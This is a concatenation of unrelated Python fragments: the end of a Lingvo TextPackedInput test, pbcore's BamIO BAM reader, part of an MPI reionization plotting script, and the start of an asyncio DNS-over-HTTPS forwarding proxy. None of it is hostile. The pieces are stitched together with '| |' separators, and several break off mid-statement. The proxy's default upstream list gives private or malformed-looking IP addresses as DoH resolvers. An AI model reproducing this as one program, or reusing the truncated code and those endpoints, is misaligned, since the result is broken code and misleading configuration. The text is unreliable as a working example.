1, 26, 19, 16, 3, 6, 13, 26, 3, 20, 5, 22, 5, 20, 9, 18, 24, 9,
0, 0, 0, 0, 0, 0
],
]))
self.assertAllEqual(
batch.tgt.labels,
np.array([
[
14, 32, 5, 8, 19, 22, 9, 3, 16, 9, 3, 20, 5, 22, 5, 20, 9, 18,
24, 9, 35, 2, 0, 0
],
[
26, 19, 16, 3, 6, 13, 26, 3, 20, 5, 22, 5, 20, 9, 18, 24, 9, 2,
0, 0, 0, 0, 0, 0
],
]))
@parameterized.named_parameters(
('no_per_host_infeed_no_packing', False, None),
('per_host_infeed_no_packing', True, None),
('no_per_host_infeed_with_packing', False, 3.5),
('per_host_infeed_with_packing', True, 3.5))
def testTextPackedInputBatchSize(self, use_per_host_infeed, packing_factor):
p = cluster_factory.Current().params.Copy()
p.job = 'trainer'
p.worker.tpus_per_replica = 8
p.worker.num_tpu_hosts = 16
p.worker.devices_per_split = 2
cluster = p.Instantiate()
with cluster, mock.patch('lingvo.core.py_utils.use_tpu', return_value=True):
p = input_generator.TextPackedInput.Params()
p.use_per_host_infeed = use_per_host_infeed
p.file_random_seed = 0
p.file_pattern = 'tfrecord:' + test_helper.test_src_dir_path(
'tasks/mt/testdata/en_fr.tfrecord')
p.pad_to_max_seq_length = True
p.tokenizer = tokenizers.AsciiTokenizer.Params()
p.input_file_type = 'sentence_proto'
p.source_max_length = 32
p.target_max_length = 32
p.bucket_batch_limit = [128]
p.packing_factor = packing_factor
with self.session() as sess:
inp = p.Instantiate()
# GlobalBatchSize is batch_size (128) * num_splits_per_client (4).
# num_splits_per_client is 4, because num_splits_per_replica is 4.
# num_splits_per_replica is 4 because that's tpus_per_replica
# divided by devices_per_split.
expected_global_batch_size = (
p.bucket_batch_limit[0] // cluster.params.worker.devices_per_split *
cluster.params.worker.tpus_per_replica)
if p.packing_factor is not None:
expected_global_batch_size = np.math.floor(
expected_global_batch_size * p.packing_factor)
expected_infeed_batch_size = expected_global_batch_size
if use_per_host_infeed:
expected_infeed_batch_size = (
expected_global_batch_size // cluster.params.worker.num_tpu_hosts)
expected_packed_infeed_batch_size = expected_infeed_batch_size
if p.packing_factor is not None:
expected_packed_infeed_batch_size = np.math.floor(
expected_infeed_batch_size / p.packing_factor)
self.assertEqual(expected_global_batch_size, inp.GlobalBatchSize())
self.assertEqual(expected_infeed_batch_size, inp.InfeedBatchSize())
batch_tensor = inp.GetPreprocessedInputBatch()
for k, x in batch_tensor.FlattenItems():
self.assertTrue(x.shape.is_fully_defined(), k)
batch = sess.run(batch_tensor)
self.assertEqual(batch.src.ids.shape,
(expected_packed_infeed_batch_size, 32))
def testTextPackedInputTextWpm(self):
p = input_generator.TextPackedInput.Params()
p.flush_every_n = 0
p.repeat_count = 1
p.file_pattern = 'text:' + test_helper.test_src_dir_path(
'tasks/mt/testdata/en_de.text')
p.tokenizer = tokenizers.WpmTokenizer.Params().Set(
vocab_filepath=test_helper.test_src_dir_path(
'tasks/mt/wpm-ende-2k.voc'),
vocab_size=2000)
p.source_max_length = 12
p.target_max_length = 15
p.bucket_batch_limit = [2]
with self.session() as sess:
inp = p.Instantiate()
batch_tensor = inp.GetPreprocessedInputBatch()
batch = sess.run(batch_tensor)
print(batch)
self.assertAllEqual(
batch.src.ids,
np.array([[109, 251, 98, 595, 1009, 245, 326, 129, 4, 2, 0, 0],
[115, 276, 18, 66, 2, 0, 0, 0, 0, 0, 0, 0]]))
self.assertAllEqual(
batch.tgt.ids,
np.array([[
1, 197, 446, 458, 419, 284, 323, 1411, 571, 456, 409, 13, 4, 0, 0
], [1, 115, 281, 18, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]))
self.assertAllEqual(
batch.tgt.labels,
np.array([[
197, 446, 458, 419, 284, 323, 1411, 571, 456, 409, 13, 4, 2, 0, 0
], [115, 281, 18, 66, | |
<filename>pbcore/io/align/BamIO.py
# Author: <NAME>
__all__ = [ "BamReader", "IndexedBamReader" ]
try:
from pysam.calignmentfile import AlignmentFile # pylint: disable=no-name-in-module, import-error, fixme, line-too-long
except ImportError:
from pysam.libcalignmentfile import AlignmentFile # pylint: disable=no-name-in-module, import-error, fixme, line-too-long
from pbcore.io import FastaTable
from pbcore.chemistry import decodeTriple, ChemistryLookupError
import numpy as np
from itertools import groupby
from functools import wraps
from os.path import abspath, expanduser, exists
from ..base import ReaderBase
from .PacBioBamIndex import PacBioBamIndex
from .BamAlignment import *
from ._BamSupport import *
from ._AlignmentMixin import AlignmentReaderMixin, IndexedAlignmentReaderMixin
def requiresBai(method):
@wraps(method)
def f(bamReader, *args, **kwargs):
if not bamReader.peer.has_index():
raise UnavailableFeature("this feature requires an standard BAM index file (bam.bai)")
else:
return method(bamReader, *args, **kwargs)
return f
class _BamReaderBase(ReaderBase):
"""
The BamReader class provides a high-level interface to PacBio BAM
files. If a PacBio BAM index (bam.pbi file) is present and the
user instantiates the BamReader using the reference FASTA as the
second argument, the BamReader will provide an interface
compatible with CmpH5Reader.
"""
def _loadReferenceInfo(self):
refRecords = self.peer.header["SQ"]
refNames = [r["SN"] for r in refRecords]
refLengths = [r["LN"] for r in refRecords]
refMD5s = [r["M5"] for r in refRecords]
refIds = list(map(self.peer.get_tid, refNames))
nRefs = len(refRecords)
if nRefs > 0:
self._referenceInfoTable = np.rec.fromrecords(list(zip(
refIds,
refIds,
refNames,
refNames,
refLengths,
refMD5s,
np.zeros(nRefs, dtype=np.uint32),
np.zeros(nRefs, dtype=np.uint32))),
dtype=[('ID', '<i8'), ('RefInfoID', '<i8'),
('Name', 'O'), ('FullName', 'O'),
('Length', '<i8'), ('MD5', 'O'),
('StartRow', '<u4'), ('EndRow', '<u4')])
self._referenceDict = {}
self._referenceDict.update(list(zip(refIds, self._referenceInfoTable)))
self._referenceDict.update(list(zip(refNames, self._referenceInfoTable)))
else:
self._referenceInfoTable = None
self._referenceDict = None
def _loadReadGroupInfo(self):
rgs = self.peer.header["RG"]
readGroupTable_ = []
# RGID -> ("abstract feature name" -> actual feature name)
self._baseFeatureNameMappings = {}
self._pulseFeatureNameMappings = {}
for rg in rgs:
rgID = rgAsInt(rg["ID"])
rgName = rg["PU"]
ds = dict([pair.split("=") for pair in rg["DS"].split(";") if pair != ""])
# spec: we only consider first two components of basecaller version
# in "chem" lookup
rgReadType = ds["READTYPE"]
rgChem = "unknown"
rgFrameRate = 0.0
if rgReadType != "TRANSCRIPT":
rgFrameRate = ds["FRAMERATEHZ"]
basecallerVersion = ".".join(ds["BASECALLERVERSION"].split(".")[0:2])
triple = ds["BINDINGKIT"], ds["SEQUENCINGKIT"], basecallerVersion
rgChem = decodeTriple(*triple)
# Look for the features manifest entries within the DS tag,
# and build an "indirection layer", i.e. to get from
# "Ipd" to "Ipd:Frames"
# (This is a bit messy. Can we separate the manifest from
# the rest of the DS content?)
baseFeatureNameMapping = { key.split(":")[0] : key
for key in list(ds.keys())
if key in BASE_FEATURE_TAGS }
pulseFeatureNameMapping = { key.split(":")[0] : key
for key in list(ds.keys())
if key in PULSE_FEATURE_TAGS }
self._baseFeatureNameMappings[rgID] = baseFeatureNameMapping
self._pulseFeatureNameMappings[rgID] = pulseFeatureNameMapping
readGroupTable_.append((rgID, rgName, rgReadType, rgChem, rgFrameRate,
frozenset(iter(baseFeatureNameMapping.keys()))))
self._readGroupTable = np.rec.fromrecords(
readGroupTable_,
dtype=[("ID" , np.int32),
("MovieName" , "O"),
("ReadType" , "O"),
("SequencingChemistry", "O"),
("FrameRate", float),
("BaseFeatures", "O")])
assert len(set(self._readGroupTable.ID)) == len(self._readGroupTable), \
"First 8 chars of read group IDs must be unique!"
self._readGroupDict = { rg.ID : rg
for rg in self._readGroupTable }
# The base/pulse features "available" to clients of this file are the intersection
# of features available from each read group.
self._baseFeaturesAvailable = set.intersection(
*[set(mapping.keys()) for mapping in list(self._baseFeatureNameMappings.values())])
self._pulseFeaturesAvailable = set.intersection(
*[set(mapping.keys()) for mapping in list(self._pulseFeatureNameMappings.values())])
def _loadProgramInfo(self):
pgRecords = [ (pg["ID"], pg.get("VN", None), pg.get("CL", None))
for pg in self.peer.header.get("PG", []) ]
if len(pgRecords) > 0:
self._programTable = np.rec.fromrecords(
pgRecords,
dtype=[("ID" , "O"),
("Version", "O"),
("CommandLine", "O")])
else:
self._programTable = None
def _loadReferenceFasta(self, referenceFastaFname):
ft = FastaTable(referenceFastaFname)
# Verify that this FASTA is in agreement with the BAM's
# reference table---BAM should be a subset.
fastaIdsAndLens = set((c.id, len(c)) for c in ft)
bamIdsAndLens = set((c.Name, c.Length) for c in self.referenceInfoTable)
if not bamIdsAndLens.issubset(fastaIdsAndLens):
raise ReferenceMismatch("FASTA file must contain superset of reference contigs in BAM")
self.referenceFasta = ft
def _checkFileCompatibility(self):
# Verify that this is a "pacbio" BAM file of version at least
# 3.0.1
badVersionException = IncompatibleFile(
"This BAM file is incompatible with this API " +
"(only PacBio BAM files version >= 3.0.1 are supported)")
checkedVersion = self.version
if "b" in checkedVersion:
raise badVersionException
else:
major, minor, patch = checkedVersion.split('.')
if not (major, minor, patch) >= (3, 0, 1):
raise badVersionException
def __init__(self, fname, referenceFastaFname=None):
self.filename = fname = abspath(expanduser(fname))
self.peer = AlignmentFile(fname, "rb", check_sq=False)
self._checkFileCompatibility()
self._loadReferenceInfo()
self._loadReadGroupInfo()
self._loadProgramInfo()
self.referenceFasta = None
if referenceFastaFname is not None:
if self.isUnmapped:
raise ValueError("Unmapped BAM file--reference FASTA should not be given as argument to BamReader")
self._loadReferenceFasta(referenceFastaFname)
@property
def isIndexLoaded(self):
return self.index is not None # pylint: disable=no-member
@property
def isReferenceLoaded(self):
return self.referenceFasta is not None
@property
def isUnmapped(self):
return not(self.isMapped)
@property
def isMapped(self):
return len(self.peer.header["SQ"]) > 0
@property
def alignmentIndex(self):
raise UnavailableFeature("BAM has no alignment index")
@property
def movieNames(self):
return set([mi.MovieName for mi in self.readGroupTable])
@property
def readGroupTable(self):
return self._readGroupTable
def readGroupInfo(self, readGroupId):
return self._readGroupDict[readGroupId]
@property
def sequencingChemistry(self):
"""
List of the sequencing chemistries by movie. Order is
unspecified.
"""
return list(self.readGroupTable.SequencingChemistry)
@property
def referenceInfoTable(self):
return self._referenceInfoTable
#TODO: standard? how about subread instead? why capitalize ccs?
# can we standardize this? is cDNA an additional possibility
@property
def readType(self):
"""
Either "standard", "CCS", "mixed", or "unknown", to represent the
type of PacBio reads aligned in this BAM file.
"""
readTypes = self.readGroupTable.ReadType
if all(readTypes == "SUBREAD"):
return "standard"
elif all(readTypes == "CCS"):
return "CCS"
elif all(readTypes == "TRANSCRIPT"):
return "TRANSCRIPT"
elif all((readTypes == "CCS") | (readTypes == "SUBREAD")):
return "mixed"
else:
return "unknown"
@property
def version(self):
return self.peer.header["HD"]["pb"]
def versionAtLeast(self, minimalVersion):
raise Unimplemented()
def softwareVersion(self, programName):
raise Unimplemented()
@property
def isSorted(self):
return self.peer.header["HD"]["SO"] == "coordinate"
@property
def isBarcoded(self):
raise Unimplemented()
@property
def isEmpty(self):
return (len(self) == 0)
def referenceInfo(self, key):
return self._referenceDict[key]
def atOffset(self, offset):
self.peer.seek(offset)
return BamAlignment(self, next(self.peer))
def hasBaseFeature(self, featureName):
return featureName in self._baseFeaturesAvailable
def baseFeaturesAvailable(self):
return self._baseFeaturesAvailable
def hasPulseFeature(self, featureName):
return featureName in self._pulseFeaturesAvailable
def pulseFeaturesAvailable(self):
return self._pulseFeaturesAvailable
def hasPulseFeatures(self):
"""
Is this BAM file a product of running analysis with the
PacBio-internal analysis mode enabled?
"""
return self.hasPulseFeature("PulseCall")
@property
def barcode(self):
raise Unimplemented()
@property
def barcodeName(self):
raise Unimplemented()
@property
def barcodes(self):
raise Unimplemented()
@requiresBai
def __len__(self):
return self.peer.mapped + self.peer.unmapped
def close(self):
if hasattr(self, "file") and self.file is not None:
self.file.close()
self.file = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
class BamReader(_BamReaderBase, AlignmentReaderMixin):
"""
Reader for a BAM with a bam.bai (SAMtools) index, but not a
bam.pbi (PacBio) index. Supports basic BAM operations.
"""
def __init__(self, fname, referenceFastaFname=None):
super(BamReader, self).__init__(fname, referenceFastaFname)
@property
def index(self):
return None
def __iter__(self):
self.peer.reset()
for a in self.peer:
yield BamAlignment(self, a)
def readsInRange(self, winId, winStart, winEnd, justIndices=False):
# PYSAM BUG: fetch doesn't work if arg 1 is tid and not rname
if not isinstance(winId, str):
winId = self.peer.get_reference_name(winId)
if justIndices == True:
raise UnavailableFeature("BAM is not random-access")
else:
return ( BamAlignment(self, it)
for it in self.peer.fetch(winId, winStart, winEnd, multiple_iterators=False) )
def __getitem__(self, rowNumbers):
raise UnavailableFeature("Use IndexedBamReader to get row-number based slicing.")
class IndexedBamReader(_BamReaderBase, IndexedAlignmentReaderMixin):
"""
A `IndexedBamReader` is a BAM reader class that uses the
``bam.pbi`` (PacBio BAM index) file to enable random access by
"row number" and to provide access to precomputed semantic
information about the BAM records
"""
def __init__(self, fname, referenceFastaFname=None, sharedIndex=None):
super(IndexedBamReader, self).__init__(fname, referenceFastaFname)
if sharedIndex is None:
self.pbi = None
pbiFname = self.filename + ".pbi"
if exists(pbiFname):
self.pbi = PacBioBamIndex(pbiFname)
else:
raise IOError("IndexedBamReader requires bam.pbi index file "+
"to read {f}".format(f=fname))
else:
self.pbi = sharedIndex
@property
def index(self):
return self.pbi
def atRowNumber(self, rn):
offset = self.pbi.virtualFileOffset[rn]
self.peer.seek(offset)
return BamAlignment(self, next(self.peer), rn)
def readsInRange(self, winId, winStart, winEnd, justIndices=False):
if isinstance(winId, str):
winId = self.referenceInfo(winId).ID
ix = self.pbi.rangeQuery(winId, winStart, winEnd)
if justIndices:
return ix
else:
return self[ix]
def __iter__(self):
self.peer.reset()
for (rowNumber, peerRecord) in enumerate(self.peer):
yield BamAlignment(self, peerRecord, rowNumber)
def __len__(self):
return len(self.pbi)
def __getitem__(self, rowNumbers):
if (isinstance(rowNumbers, int) or
issubclass(type(rowNumbers), np.integer)):
return self.atRowNumber(rowNumbers)
elif isinstance(rowNumbers, slice):
return ( self.atRowNumber(r)
for r in range(*rowNumbers.indices(len(self))))
elif isinstance(rowNumbers, list) or isinstance(rowNumbers, np.ndarray):
if len(rowNumbers) == 0:
return []
else:
entryType = type(rowNumbers[0])
if entryType == int or issubclass(entryType, np.integer):
return ( self.atRowNumber(r) for r in rowNumbers )
elif entryType == bool or issubclass(entryType, np.bool_):
return ( self.atRowNumber(r) for r in np.flatnonzero(rowNumbers) )
raise TypeError("Invalid type for IndexedBamReader slicing")
def __getattr__(self, key):
if | |
{0}".format(output_dir))
MC_dir = "{0}/MC".format(output_dir)
os.makedirs(MC_dir)
print("Made directory {0}".format(MC_dir))
# First calculate all the properties and statistics we need.
reion_data = generate_data(rank, size, comm, reion_ini_files,
gal_ini_files, reion_plots, output_dir,
model_tags, output_format)
# Gather all the fractions onto the master process.
# This will be used for many different plots.
master_mass_frac = collective.collect_hist_across_tasks(rank, comm,
reion_data["mass_frac_allmodels"])
master_mass_frac = comm.bcast(master_mass_frac, root = 0)
# Then find out what we need and plot em!
if reion_plots["history"] and rank == 0:
duration_z, duration_t, reion_completed = \
calc_duration(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
master_mass_frac, reion_plots["duration_definition"])
for model_number in range(len(master_mass_frac)):
print("Model {0}: Start {1:.2f} \tMid {2:.2f}\tEnd {3:.2f}\t"
"dz {4:.2f}\tdt {5:.1f}Myr\tReion Completed {6}" \
.format(model_number, duration_z[model_number][0],
duration_z[model_number][1], duration_z[model_number][-1],
duration_z[model_number][0]-duration_z[model_number][-1],
duration_t[model_number][-1]-duration_t[model_number][0],
reion_completed[model_number]))
print("Plotting the reionization history.")
reionplot.plot_history(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_mass_frac,
model_tags, output_dir, "history",
output_format)
if reion_plots["nion"]:
master_nion = collective.collect_hist_across_tasks(rank, comm,
reion_data["nion_allmodels"])
if rank == 0:
print("Plotting the ionizing emissivity.")
reionplot.plot_nion(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_nion,
reion_data["nion_factor_allmodels"],
model_tags, output_dir, "nion", output_format)
if reion_plots["ps_fixed_XHI"]:
k, P21, PHII = determine_ps_fixed_XHI(rank, size, comm,
reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
master_mass_frac,
reion_data["XHII_fbase_allmodels"],
reion_data["XHII_precision_allmodels"],
reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_data["first_snap_allmodels"],
reion_plots["fixed_XHI_values"])
if rank == 0:
print("Plotting PS at fixed neutral fraction.")
reionplot.plot_ps_fixed_XHI(k, P21, PHII,
reion_plots["fixed_XHI_values"],
model_tags, output_dir, "ps_fixed_XHI",
output_format)
if reion_plots["contours"] and rank == 0:
# tau is used for multiple plots. So check if we need to calculate it.
try:
tau_allmodels
except NameError:
tau_allmodels = calc_tau(reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["helium_allmodels"],
master_mass_frac)
# For the contours, only plot the optical depth at the highest z.
tau_highz = []
for model_number in range(len(tau_allmodels)):
tau_highz.append(tau_allmodels[model_number][0])
duration_z, duration_t, reion_completed = \
calc_duration(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
master_mass_frac, reion_plots["duration_definition"])
print("Plotting contours of constant tau.")
reionplot.plot_tau_contours(tau_highz, reion_completed,
reion_plots["alpha_beta_limits"],
output_dir, "tau_contours", output_format)
print("Plotting contours of constant reionization duration.")
reionplot.plot_duration_contours(duration_t, reion_completed,
reion_plots["alpha_beta_limits"],
output_dir, "duration_contours",
output_format)
if reion_plots["optical_depth"] and rank == 0:
# tau is used for multiple plots. So check if we need to calculate it.
try:
tau_allmodels
except NameError:
tau_allmodels = calc_tau(reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["helium_allmodels"],
master_mass_frac)
print("Plotting the optical depth.")
reionplot.plot_tau(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
tau_allmodels,
model_tags, output_dir, "optical_depth",
output_format)
if reion_plots["optical_depth"] and reion_plots["history"] and rank == 0:
print("Plotting the combined optical depth/ionization history.")
reionplot.plot_combined_history_tau(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_mass_frac, tau_allmodels,
model_tags, output_dir,
"history_tau", output_format)
if reion_plots["optical_depth"] and reion_plots["nion"] and rank == 0:
print("Plotting the combined optical depth/ionizing emissivity.")
reionplot.plot_combined_nion_tau(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_nion,
reion_data["nion_factor_allmodels"],
tau_allmodels, model_tags, output_dir,
"nion_tau", output_format)
if reion_plots["ps_scales"] or reion_plots["ps_scales_beta"]:
print("Gathering the 21cm Power Spectra across processors")
k, P21, PHII = gather_ps(rank, size, comm,
reion_data["k_allmodels"],
reion_data["P21_allmodels"],
reion_data["PHII_allmodels"],
reion_data["first_snap_allmodels"],
reion_data["last_snap_allmodels"])
if rank == 0:
print("Plotting the large scale power as a function of small "
"scale.")
if reion_plots["ps_scales_beta"]:
calc_beta = True
else:
calc_beta = False
# Now that we have all the PS on the master rank, calculate the
# amplitude at the specified scales.
scale_power_dict = calc_scale_power(k, P21, PHII,
reion_data["z_array_reion_allmodels"],
reion_plots["small_scale_def"],
reion_plots["large_scale_def"],
reion_plots["small_scale_err"],
reion_plots["large_scale_err"],
calc_beta=calc_beta)
k_small_scale = scale_power_dict["k_small_scale"]
k_large_scale = scale_power_dict["k_large_scale"]
P21_small_scale = scale_power_dict["P21_small_scale"]
P21_large_scale = scale_power_dict["P21_large_scale"]
PHII_small_scale = scale_power_dict["PHII_small_scale"]
PHII_large_scale = scale_power_dict["PHII_large_scale"]
if reion_plots["ps_scales"]:
reionplot.plot_ps_scales(P21_small_scale,
P21_large_scale, master_mass_frac,
reion_data["z_array_reion_allmodels"],
reion_plots["fixed_XHI_values"],
reion_plots["ps_scales_z"],
reion_plots["small_scale_def"],
reion_plots["large_scale_def"],
reion_plots["small_scale_err"],
reion_plots["large_scale_err"],
model_tags, output_dir, "ps_scales",
output_format)
if reion_plots["ps_scales_beta"]:
P21_beta = scale_power_dict["P21_beta"]
P21_beta_error = scale_power_dict["P21_beta_error"]
PHII_beta = scale_power_dict["PHII_beta"]
reionplot.plot_ps_beta(P21_beta, P21_beta_error,
reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
reion_plots["small_scale_def"],
reion_plots["large_scale_def"],
model_tags, output_dir,
"ps_scales_beta", output_format)
if reion_plots["slices_fixed_XHI"] and rank == 0:
print("Plotting slices at fixed XHI fractions.")
reionplot.plot_slices_XHI(reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
master_mass_frac,
reion_data["XHII_fbase_allmodels"],
reion_data["XHII_precision_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_data["first_snap_allmodels"],
reion_plots["fixed_XHI_values"],
reion_plots["cut_slice"],
reion_plots["cut_thickness"],
model_tags, output_dir, "slices_XHI",
output_format)
if reion_plots["bubble_size"] and rank == 0:
print("Determining bubble sizes at fixed XHI.")
reionplot.determine_bubble_size(reion_data["z_array_reion_allmodels"],
master_mass_frac,
reion_data["first_snap_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_plots["fixed_XHI_values"],
model_tags, output_dir)
if reion_plots["zreion_dens_cross"] and rank == 0:
print("Calculating the zreion-density cross correlation.")
k, crosspspec, crosscorr, bias = \
zreion_dens_cross(reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["zreion_path_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_data["last_snap_allmodels"])
reionplot.plot_zreion_dens_cross(k, crosscorr, bias, model_tags,
output_dir, "zreion_dens_crosscorr",
output_format)
if reion_plots["dens_ion_contours"] and rank == 0:
print("Plotting contours of density-ionization.")
reionplot.plot_dens_reion_contours(master_mass_frac,
reion_data["XHII_fbase_allmodels"],
reion_data["XHII_precision_allmodels"],
reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["first_snap_allmodels"],
reion_plots["fixed_XHI_values"],
model_tags, output_dir,
"dens_ion_contours", output_format)
if reion_plots["dens_zreion_contours"] and rank == 0:
print("Plotting contours of density-zreion.")
reionplot.plot_dens_zreion_contours(reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["zreion_path_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["last_snap_allmodels"],
model_tags, output_dir,
"dens_zreion_contours", output_format)
def generate_data(rank, size, comm, reion_ini_files, gal_ini_files,
reion_plots, output_dir, model_tags, output_format):
"""
Reads in the galaxy data for calculate all the require properties for each
models.
Parameters
----------
rank : Integer
This processor rank.
size : Integer
The total number of processors executing the pipeline.
comm : Class ``mpi4py.MPI.Intracomm``
The ``mpi4py`` communicator.
reion_ini_files, gal_ini_files : List of strings
``.ini`` file corresponding to each model that we're plotting. We need
both the galaxy (``SAGE``) and reionization (``cifog``) ``.ini`` files.
reion_plots : Dictionary
Controls which of the plots we will make. Keys are the name of each
plot (e.g., ``reion``) and the value specifies if we are plotting it. If
we're not plotting a property we don't need to calculate stuff for it!
output_dir : String
Directory where the plots are saved. Used to save MC data.
model_tags : List of strings
String that will appear on the legend of the plot for each model. Used
to save MC data with a unique name.
Returns
---------
reion_data : Dictionary
All of the calculated properties required to create the reionization
plots.
"""
if rank == 0:
print("Generating reionization data for a total of {0} "
"models and saving plots in directory {1}" \
.format(len(reion_ini_files), output_dir))
# ======================================================================= #
# We calculate values for all models and put them into lists that are #
# indexed by ``model_number``. So first we need to set up the outer-lists #
# then we will append to these for each model. #
# ======================================================================= #
# Unlike GalaxyData where we use the whole redshift range, here we only use
# the range that covers reionization.
z_array_reion_allmodels = []
lookback_array_reion_allmodels = []
# Since we calculate some things after the main loop, need to remember the
# file names/precisions for each model.
XHII_fbase_allmodels = []
XHII_precision_allmodels = []
density_fbase_allmodels = []
density_precision_allmodels = []
zreion_path_allmodels = []
first_snap_allmodels = []
last_snap_allmodels = []
GridSize_allmodels = []
boxsize_allmodels = []
helium_allmodels = []
nion_factor_allmodels = []
cosmology_allmodels = []
t_bigbang_allmodels = []
# Be careful, we use neutral fraction values here.
volume_frac_allmodels = []
mass_frac_allmodels = []
# These are the nion grids used in cifog, so these are **actual** escaping
# ionizing photons.
nion_allmodels = []
# Power Spectra.
k_allmodels = []
P21_allmodels = []
PHII_allmodels = []
# All outer arrays set up, time to read in the data!
for model_number, (reion_ini_file, gal_ini_file) in \
enumerate(zip(reion_ini_files, gal_ini_files)):
if rank == 0:
print("Model {0}".format(model_number))
# Read in the parameters and set some initial variables.
SAGE_params = rs.read_SAGE_ini(gal_ini_file)
cifog_params, _ = rs.read_cifog_ini(reion_ini_file, SAGE_params)
cosmology, t_bigbang = gd.set_cosmology(float(SAGE_params["Hubble_h"]),
float(SAGE_params["Omega"]),
float(cifog_params["omega_b"]))
cosmology_allmodels.append(cosmology)
t_bigbang_allmodels.append(t_bigbang)
first_snap = int(SAGE_params["LowSnap"])
first_snap_allmodels.append(first_snap)
last_snap = int(SAGE_params["LastSnapShotNr"])
last_snap_allmodels.append(last_snap)
GridSize = int(SAGE_params["GridSize"])
GridSize_allmodels.append(GridSize)
# Careful, cifog uses Mpc/h.
boxsize = float(SAGE_params["BoxSize"])
boxsize_allmodels.append(boxsize)
# However we use the volume as Mpc^3.
model_volume = pow(float(SAGE_params["BoxSize"]) / \
float(SAGE_params["Hubble_h"]),3)
helium = float(cifog_params["Y"])
helium_allmodels.append(helium)
nion_factor = float(cifog_params["nion_factor"])
nion_factor_allmodels.append(nion_factor)
model_hubble_h = float(SAGE_params["Hubble_h"])
model_halopartcut = int(SAGE_params["HaloPartCut"])
# Load the redshift file and calculate the lookback times.
z_array_full, lookback_array_full = gd.load_redshifts(SAGE_params["FileWithSnapList"],
cosmology, t_bigbang)
z_array_reion = np.array(z_array_full[first_snap:last_snap])
lookback_array_reion = np.array(lookback_array_full[first_snap:last_snap])
z_array_reion_allmodels.append(z_array_reion)
lookback_array_reion_allmodels.append(lookback_array_reion)
# Determine the base file names for the ionization, ionizing photons
# and density fields.
XHII_fbase = cifog_params["output_XHII_file"]
XHII_fbase_allmodels.append(XHII_fbase)
density_fbase = cifog_params["inputIgmDensityFile"]
density_fbase_allmodels.append(density_fbase)
zreion_path = "{0}/{1}".format(SAGE_params["PhotoionDir"],
SAGE_params["ReionRedshiftName"])
zreion_path_allmodels.append(zreion_path)
nion_fbase = cifog_params["inputNionFile"]
# cifog uses 0 for floating point and 1 for double precision.
# I use 0 for integer, 1 for floating point and 2 for double precision.
density_precision = int(cifog_params["densityFilesAreInDoublePrecision"])
density_precision += 1
density_precision_allmodels.append(density_precision)
nion_precision = int(cifog_params["nionFilesAreInDoublePrecision"])
nion_precision += 1
# The ionization fields are assumed to have double precision.
XHII_precision = 2
XHII_precision_allmodels.append(XHII_precision)
# Now it's time to set up all the arrays for this model number.
volume_frac_allmodels.append(np.zeros(last_snap - first_snap))
mass_frac_allmodels.append(np.zeros(last_snap - first_snap))
nion_allmodels.append(np.zeros(last_snap - first_snap))
k_allmodels.append([])
P21_allmodels.append([])
PHII_allmodels.append([])
# All arrays done, now loop over snapshots and read in.
for snapnum in range(first_snap + rank, last_snap, size):
# Where this snapshot slices into the global arrays.
snap_idx = | |
#!/usr/bin/env python3
import argparse
import array
import asyncio as aio
import base64
import itertools
import logging
import random
import statistics
from abc import ABCMeta, abstractmethod
from asyncio import DatagramTransport, Lock, StreamReader, StreamWriter, Task
from types import TracebackType
from typing import (ClassVar, Iterable, Iterator, List, Optional, Sequence,
Set, SupportsFloat, Tuple, Type, Union)
import httpx
DEFAULT_LISTEN_ADDRESSES = \
[
'127.0.0.1',
'::1',
]
DEFAULT_LISTEN_PORTS = \
[
5053,
]
DEFAULT_UPSTREAMS = \
[
'https://192.168.3.11:443/dns-query',
'https://172.16.31.10:443/dns-query',
'https://[fc00:db20:35b:7399::5]:443/dns-query',
'https://[2606:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b]:443/dns-query',
]
async def main(args) -> None:
# Setup event loop
loop = aio.get_running_loop()
# Setup DNS resolver to cache/forward queries and answers
async with AsyncDnsResolver(args.upstreams, AsyncDohUpstreamContext) as resolver:
transports = []
# Setup listening transports
for addr in args.listen_address:
for port in args.listen_port:
# Setup UDP server
logging.info('Starting UDP server listening on %s#%d' % (addr, port))
udp, _ = await loop.create_datagram_endpoint(lambda: UdpResolverProtocol(resolver), local_addr=(addr, port))
transports.append(udp)
# Setup TCP server
if args.tcp:
logging.info('Starting TCP server listening on %s#%d' % (addr, port))
tcp = await aio.start_server(TcpResolverProtocol(resolver).ahandle_peer, addr, port)
transports.append(tcp)
# Serve forever
try:
while True:
await aio.sleep(3600)
